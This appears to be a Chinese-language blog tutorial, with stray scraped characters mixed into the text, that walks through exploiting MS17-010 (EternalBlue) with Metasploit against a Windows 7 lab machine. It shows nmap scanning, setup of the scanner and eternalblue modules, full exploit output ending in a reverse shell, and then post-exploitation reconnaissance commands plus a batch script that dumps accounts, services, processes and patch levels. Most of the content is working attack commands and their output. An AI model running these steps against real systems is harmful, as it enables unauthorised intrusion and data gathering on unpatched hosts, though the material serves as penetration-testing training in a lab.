一粉捻、Metasploit介紹
Metasploit是一款開源的安全漏洞檢測工具弧轧,可以幫助安全和IT專業(yè)人士識別安全性問題雪侥,驗(yàn)證漏洞的緩解措施,并管理專家驅(qū)動的安全性進(jìn)行評估精绎,提供真正的安全風(fēng)險情報速缨。這些功能包括智能開發(fā),代碼審計代乃,Web應(yīng)用程序掃描旬牲,社會工程。團(tuán)隊(duì)合作搁吓,在Metasploit和綜合報告提出了他們的發(fā)現(xiàn)原茅。
Metasploit是一個免費(fèi)的、可下載的框架堕仔,通過它可以很容易地獲取擂橘、開發(fā)并對計算機(jī)軟件漏洞實(shí)施攻擊。它本身附帶數(shù)百個已知軟件漏洞的專業(yè)級漏洞攻擊工具摩骨。當(dāng)H.D. Moore在2003年發(fā)布Metasploit時通贞,計算機(jī)安全狀況也被永久性地改變了朗若。仿佛一夜之間,任何人都可以成為黑客昌罩,每個人都可以使用攻擊工具來攻擊那些未打過補(bǔ)丁或者剛剛打過補(bǔ)丁的漏洞哭懈。軟件廠商再也不能推遲發(fā)布針對已公布漏洞的補(bǔ)丁了,這是因?yàn)镸etasploit團(tuán)隊(duì)一直都在努力開發(fā)各種攻擊工具茎用,并將它們貢獻(xiàn)給所有Metasploit用戶遣总。
二、使用(以MS17-010為例)
2.1準(zhǔn)備環(huán)境
Kali-Linux
(base) root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.91.156 netmask 255.255.255.0 broadcast 192.168.91.255
inet6 fe80::20c:29ff:febf:3a23 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:bf:3a:23 txqueuelen 1000 (Ethernet)
RX packets 96 bytes 17375 (16.9 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 38 bytes 3529 (3.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 19 base 0x2000
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 28 bytes 1516 (1.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 28 bytes 1516 (1.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Windows7-SP1
Windows7SP1
2.2目標(biāo)主機(jī)信息收集
測試網(wǎng)絡(luò)連通性
測試網(wǎng)絡(luò)連通性
端口探測:
(base) root@kali:~# nmap -O 192.168.91.129
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 03:06 EDT
Nmap scan report for 192.168.91.129
Host is up (0.0014s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
MAC Address: 00:0C:29:7B:61:47 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.78 seconds
我們可以看到目標(biāo)主機(jī)開放了非常多的端口绘搞,我們選用445端口作為入侵點(diǎn),來對主機(jī)進(jìn)行攻擊傅物。使用的漏洞為2017年異澈幌剑火爆的永恒之藍(lán)。此漏洞攻擊利用程序(exp)已在Metasploit中集成董饰。
2.3開始攻擊
打開Kali-Linux命令行蒿褂,輸入【msfconsole】打開Metasploit。
(base) root@kali:~# msfconsole
___ ____
,-"" `. < HONK >
,' _ e )`-._ / ----
/ ,' `-._<.===-'
/ /
/ ;
_ / ;
(`._ _.-"" ""--..__,' |
<_ `-"" \
<`- :
(__ <__. ;
`-. '-.__. _.' /
\ `-.__,-' _,'
`._ , /__,-'
""._\__,'< <____
| | `----.`.
| | \ `.
; |___ \-``
\ --<
`.`.<
`-'
=[ metasploit v5.0.88-dev ]
+ -- --=[ 2013 exploits - 1093 auxiliary - 343 post ]
+ -- --=[ 566 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Search can apply complex filters such as search cve:2009 type:exploit, see all the filters with help search
msf5 >
使用【search ms17-010】搜索永恒之藍(lán)利用程序
msf5 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
我們首先使用序號1的模塊對目標(biāo)主機(jī)進(jìn)行掃描卒暂,確認(rèn)是否存在MS17-010漏洞
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
使用【show options】查看使用此模塊需要設(shè)置的參數(shù)啄栓,可以看到需要設(shè)置rhosts和rport兩個參數(shù)。其中rhosts參數(shù)為目標(biāo)主機(jī)的IP地址也祠。
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.91.129
rhosts => 192.168.91.129
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rport 445
rport => 445
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.91.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.91.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
我們設(shè)置完之后輸入【run】或者【exploit】運(yùn)行此程序即可昙楚。
在這個例子里顯示
[+] 192.168.91.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.91.129:445 - Scanned 1 of 1 hosts (100% complete)
表示程序存在此漏洞。
我們使用上圖中標(biāo)紅的的exploit模塊來對目標(biāo)主機(jī)進(jìn)行攻擊
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
參數(shù)設(shè)置完就可以攻擊了诈嘿。
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.91.129 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
可以用run命令或者exploit命令運(yùn)行:
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.91.156:4444
[*] 192.168.91.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.91.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.91.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.91.129:445 - Connecting to target for exploitation.
[+] 192.168.91.129:445 - Connection established for exploitation.
[+] 192.168.91.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.91.129:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.91.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.91.129:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.91.129:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.91.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.91.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.91.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.91.129:445 - Starting non-paged pool grooming
[+] 192.168.91.129:445 - Sending SMBv2 buffers
[+] 192.168.91.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.91.129:445 - Sending final SMBv2 buffers.
[*] 192.168.91.129:445 - Sending last fragment of exploit packet!
[*] 192.168.91.129:445 - Receiving response from exploit packet
[+] 192.168.91.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.91.129:445 - Sending egg to corrupted connection.
[*] 192.168.91.129:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.91.156:4444 -> 192.168.91.129:49216) at 2020-05-22 03:36:03 -0400
[+] 192.168.91.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.91.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.91.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
C:\Windows\system32>
彈出C:\Windows\system32的話就表示我們攻擊成功了堪旧。
然后我們收集一下目標(biāo)主機(jī)的主機(jī)信息
kali 解決Metasploit拿到shell后顯示中文亂碼問題
解決亂碼問題
chcp 65001
三、常用信息收集命令
3.1whoami 查看當(dāng)前用戶的權(quán)限
3.2查詢網(wǎng)絡(luò)配置信息
執(zhí)行ipconfig /all 獲取本機(jī)網(wǎng)絡(luò)配置信息
查詢操作系統(tǒng)版本和版本信息使用systeminfo
3.3查詢本機(jī)服務(wù)信息
wmic service list brief
3.4查詢進(jìn)程列表和進(jìn)程信息
tasklist
wmic process list brief
3.5查看啟動程序信息
wmic startup get command,caption
3.6查看主機(jī)開機(jī)時間
net statistics workstation
3.7查詢用戶列表
net user
獲取本地管理員
net localgroup administrators
查看當(dāng)前在線用戶
query user || qwinsta
3.8查看補(bǔ)丁列表
wmic qfe get Caption,Description,HotFixID,InstalledOn
3.9自動收集信息
為了提高信息收集效率奖亚,可以創(chuàng)建一個腳本淳梦,在目標(biāo)主機(jī)上完成相對應(yīng)信息的收集工作。打開記事本輸入以下命令昔字,另存為文件格式.bat的文件爆袍,會自動收集目標(biāo)主機(jī)的信息并輸出為html。
for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html
